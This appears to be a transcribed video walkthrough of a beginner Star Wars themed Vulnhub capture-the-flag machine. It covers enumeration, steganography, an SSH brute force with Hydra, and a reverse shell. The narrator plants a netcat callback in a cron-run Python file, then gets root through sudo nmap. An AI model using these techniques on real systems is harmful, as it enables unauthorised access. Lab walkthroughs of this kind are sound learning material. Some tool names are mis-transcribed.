Hey everybody, welcome to the video 7S26 Simon. Today we're going to take a look at a Star Wars themed box. So let me show you this on Vulnhub. Just so you know, I have not ever done this box before. I just typed in Star Wars and it was this one here on the right. Came out in August of 2020 and it says it's a Star Wars CTF. 1.9 gigabytes, so fairly large. And the reason I thought I'd try this one is because it says it's aimed for beginners, and to be honest, most of the beginner videos I do on this channel seem to do fairly well. They seem to attract, people who are new to this and just people who generally enjoy it. This isn't about, there's no ego. We're not trying to show off. We're just trying to enjoy this hobby together. So with that being said, as always, let me install the machine and I will be back in a second to run through it. Okay, so we are back and here is the IP address of that machine. All I did to find it, I just run sudo net discover and found the IP. And I've just plugged it into my browser, so that is exactly where I'm up to. Again, I've never done this machine before, so I don't know what to expect. It says it's easy, so who knows. Let's just go through it and find out if it is. Okay, so first things first, let's go for an nmap. All ports 168.582. Let's see what that comes back with. In the meantime, let's take a look here. We've got a massive comment down at the bottom. Let's just take that entire thing. Okay, could this be base 64? It looks like it might be. Let's try echo base 64 minus D. Wow, we've got a whole bunch of binary. Okay, let's take the binary and let's see if we can convert that in a second. Just before we do, let's get the ports. Okay, nice. I think we can actually, let's just do it online, but I think we can maybe do this in Burp Suite as well. So we're going to do binary to ASCII. I hope this isn't a rabbit hole. That will be disappointing, won't it? This is not the password. Okay, converts to this is not the password. That might be true. That might just be a rabbit hole. But hey, it could potentially be. I don't know. Password you shall find. Okay, let's save this image to desktop. Let's save this image to desktop. Oh, they're both the same. Let's just call that Yoda 2. Okay, what I'm now going to do is, I never normally do this, but again, I just don't know. I've never done this box, so I don't know. Let's just check MD5 sum of Yoda. Okay, so these are actually, I've just taken an MD5 hash. These are different photographs. Now, you can tell this one's a lighter photograph and this one isn't. I'm kind of thinking, is there any steganography going on? But we will check that later on. Let's carry on with the enumeration. I always forget. HTTP, there we go. Okay, it looks like there's an admin page. Let's do /admin, log in at your own risk. Okay, let's cancel this. Oh, this is familiar. I've seen this before. Not this box, but this is this W3 Schools? I think they've taken the code from W3 Schools. I've seen this exact layout. Anyway, that doesn't really matter. Username, Yoda. This is not the password. Let's try this. Okay, not found. Okay, that makes me think the action page is potentially broken. Okay, let's try to... We've searched all ports. We've done a derb. Okay, maybe it's time to try... what's that tool called? Stag hide. Here we go. Extract Yoda. Let's just try the first one. Enter passphrase. This is not the password. Let's try this. I don't know anything about Star Wars, by the way. Could not extract any data. Okay, let's try number 2. Yoda 2. Paste. The file format is not supported. Okay, that kind of sucks. So, what can we do? Let's just close this tab. I still think it's something to do with these passwords. Steganography decoder online. To encode a message code, we want to decode. To decode a hidden message, all the magic happen. Neither the image or the message will be transmitted over the web. It all happens in the browser. Okay, it's not my image anyway, so I don't really care. Let's see if this works. Decode. Nothing in there. Let's give this a quick look through. Nothing stands out. They are different photographs, so let's try Yoda 2. Aha! The real password is Baby Yoda 123. Let's take... Okay, so that is a rabbit hole. That's not real. Okay, so that means if we go back to admin, let's log in. Let's try Yoda and Baby Yoda 123. Oh, it still doesn't work. Maybe it's SSH. 192.168.5.82. Yes. Paste in Baby Yoda. Really? Doesn't work? Okay, let's try one more time. Ah, interesting. Okay, so that doesn't work. Let's just take a note. So real password, Baby Yoda. Let's carry on with the enumeration. Let's go back here. We found a WordPress. Let's just check out WordPress. What makes you think this is a WordPress installation? No comments. There's a robots.txt. Why does the Jedi Order keep checking the robots take? He might look at this. It looks like a file path. Oh god, what's this? Ignorant saw her drawings, marriage, laughter. Let's just check. Oops. Let's just check comments. And there's nothing I can see in there that looks too... There's nothing in there that looks too useful at the moment. Let's just take a copy of this link. Okay, so the next step is we've used derb. Let's try... I guess what we could do, we could try to look for... different... Let's use GoBuster maybe. GoBuster. Dir minus u. I do want that. I do want that word list, so let's copy that. Change the IP to 5.82. And then what we could do with GoBuster is GoBuster search for all extensions. So we can choose with GoBuster to look for different extensions, and it's -x to do that. So let's look for PHP, JavaScript, HTML, TXT maybe. Okay, let's see what this comes back with. So, oh, this is coming back with lots of 403s. We don't want 403s, do we? We want is -s a status code string. Let's just try 403, see if that stops. 200. I forget the command which just didn't display progress. Let's just use -q for the time being. I'd still bring him back. What's this here? JavaScript. Copy link. Let's just go there before we do it a bit more. You don't have permission. Yeah, I don't want to. GoBuster don't show 403. I always forget this command. I always forget it. 403 status codes. Oops, let's go back. Oh, I didn't want to go there really. For some reason I thought it was, if I just go Buster. GoBuster don't show 443. Let me pause the video because I don't want to waste your time as I try to figure this out. Just bear with me and I will be right back. Okay, so I've actually just been able to. You can do the same thing in Derb, but you just specify the. This is actually, to be honest, this is exactly what I wanted to do. Specify the extension, dot extension, comma separator, and just do that for every file you want. It's come back with index robots, which we've looked at, and something called users.js. So let's go take a look. Han and Skywalker. So they're gonna be the users of the system. Let's clear the window and let's go back and let's do an SSH. So where's our SSH? Here we go. So it's not Yoda. It's probably, should we go for the top one? Skywalker. Baby Yoda 123. Nope. Okay, it's got to be Han. Baby Yoda 1, 2, 3. Hey, yes, we are in. We are running as Han. Okay, now the privilege escalation begins. We've got something called .secrets there. That's a directory. Let's take a look. Anakin is a cool... okay. Cool is a tool. Let's open up a new terminal. So cool you can use to... We've actually used this before. Cool is a tool that generates passwords. It's gonna be using that page we saw before. This one here, I believe. I think it's gonna be using this. So cool W passgen, and then let's give this 5.82/R2D2. So we just run cool, and then I guess let's just do head passgen. Okay, so it's just give us a couple of passwords here using this command. So I guess what we now need to do is let's try running Hydra -L. Let's just, it's easier to just change all of this. So 582 SSH. We're not using that RockU list. We're going to change that. And we're going to say passgen. And then if we change it to Skywalker, let's give this a shot. I wonder if this is just another user, or maybe this is the admin account. I'm not sure. Let's see. Oh, okay. Tatooine. Okay. So let's do an SU Skywalker, because we're already logged in. So if we do Skywalker Tatooine. Okay, we are now Skywalker. That has officially worked. Let's do an LSA. Let's jump into his secrets folder. He's got one too. Darth must take up the job of being a good father. Okay. I know I don't really know much about Star Wars, but I know, you know, Darth is supposed to be Luke Skywalker's father, I think. Let's cat bash _history. Okay, if we look at the bash history, we can see secrets, touch second half, clone 50, touch note, remove second half. Okay, so whoever's created this box, they have left some trace of what they've been doing. SU Darth, service cron status, cat evil.py, nano evil.py, PS, so they're looking at processes. So what's in the processes? This is definitely an interesting machine. It's kind of not really where I thought this one was going, to be completely honest. But anyway, ultimately, we need to LSLA secrets. LSLA. Okay, so there's nothing else in the secrets folder. apart from the note. I guess let's do a locate evil.py. Oh, we don't have locate. Okay, find notes .txt. Oops. Linux find file name containing string. What's the one we want? We don't really want the max depth, do we? Just name. Oh, you could have used grep. Let's try that grep. That looks like it could be useful. Grep recursive. So grep minus r evil.py, and then let's give it the /. Let's see if we've got permissions to, well, first of all, find this file. This may take a long time. I did just see it appear there, I think. Home Darth permissioned in. Here we go. Bash history. Okay, there's a home Darth, so it looks like the user. Let's just, can we cancel? Yep. CD home ls Darth lsla. Okay, looks like we've got permissions to read his files. cd.secrets cat evil.py. Let the fear flow through you every single minute. And this is okay. Okay. Let's see whether what we can do is this might be running, because we saw the mentioned the cron job before. So show all cron jobs. So it could be in this hourly. Let's check this one. If we do a LSLA on the cron daily, let's just see if it's in here. Cron .d anacron evil.py. There we go. So that user there, anacron, let's do a cat etc password. I can't actually see that user anywhere at the moment. Let me just check that again. Oh, that's the name of the folder. My mistake. I misread it. Okay, so it's running that every so often. So what we need to do, let's put a reverse shell in here. So we just go back to Google, Python reverse shell, IP ADDR. Let's take our own IP, which is a 176. And then what we want to do is we're going to use this. Let's first of all write up our command. Here we go, Anakin, that's where I saw it before. So 192.168.5.176. And let's take all of that. And then what we'll do is we will ls evil.py. So we will echo we're just going to use one greater than arrow, one because that's going to overwrite the file. In fact, yeah, that's yeah, we'll do that. Let's overwrite it. Who cares? That should work, I think. Cat evil. Yeah, that looks like it's worked. And oops, and LVP 1 2 3 4. Okay. So with any luck, hopefully that will run within 1 minute, and hopefully that will be enough to get a shell. So let's keep our fingers crossed. Hopefully within a minute of this running, it should give us a connection. I'll just pause this, just again, just so I don't waste anyone's time watching this. Just bear with me a second. So I've just thought that this may not actually work because it's not running Python from the terminal, it's actually running a Python file. So what we actually need to do is we need to... Oh, this is frustrating. Okay, nano evil.py, let's delete that line. And what we need to do is import OS, and we need to basically os.system, and then we need to make it run netcat execute on netcat 192.168.5.176 1 2 3 4 and execute bin bash, and hopefully that should now be enough. Let's just do a cat evil.py import os, os.system, netcat. Okay. That looks like it should work to me. We've told it to connect to our machine, we've told it what port, and we've told it to execute bin bash. So I don't see any reason why that won't work. Let's wait a minute. Everyone watching, keep your eye in this area. And it should. Here we go. Connection ID. Okay, we're Darth, but we're not root. I don't think. Okay, let's have a look. LSLA. Okay, so we're in the Darth folder. Who am I again? So I am actually Darth. Okay. So I guess what we now need to look at is uname -a, sudo -l. Okay, it looks like this is going to be the way forward. User bin nmap seems to be the file here, so let's go to GTFO bins, let's type in nmap, and I have done this before, usually this one works. Okay, that hasn't gone through, so let me just try user bin nmap interactive. No, it didn't. User bin nmap -v nmap 7.70. Ah, okay, so this is okay, that explains it. So we're on a newer version. Okay, so I guess what we need to do is, let's see if we can try this one. Okay, user bin sudo user bin nmap script equals tf. Here we are root. There you go, perfect. So we just had to basically run sudo, point it to where our nmap was located, and then just sort of use the end of this. So it's basically executed the bin sh shell as the root user. Okay, so now let's cd over to root. Can we claim our flag? Cat flag. There we go. Finally. I hope you liked it, Padawan. Yeah, that was definitely a cool. That was a, what difficulty level was this? Was that easy? Was that supposed to be easy? That was a little bit. It did give a little bit of trouble. Theme for beginners. Okay. Yeah. Okay, that's fair enough. I feel like that was probably. I think it was bordering on intermediate. It was a little bit. It definitely made me think. But yeah, great box, really enjoyed it. How long did that take us? 31 minutes, nearly 32 minutes of recording time. So yeah, that took me quite a while. But I hope everyone watching learned something. I've definitely not so much learned stuff, but it's all about enumeration. Enumerate, and ultimately we ended up with root access. Okay, thanks for watching, guys. I will see you in the next one.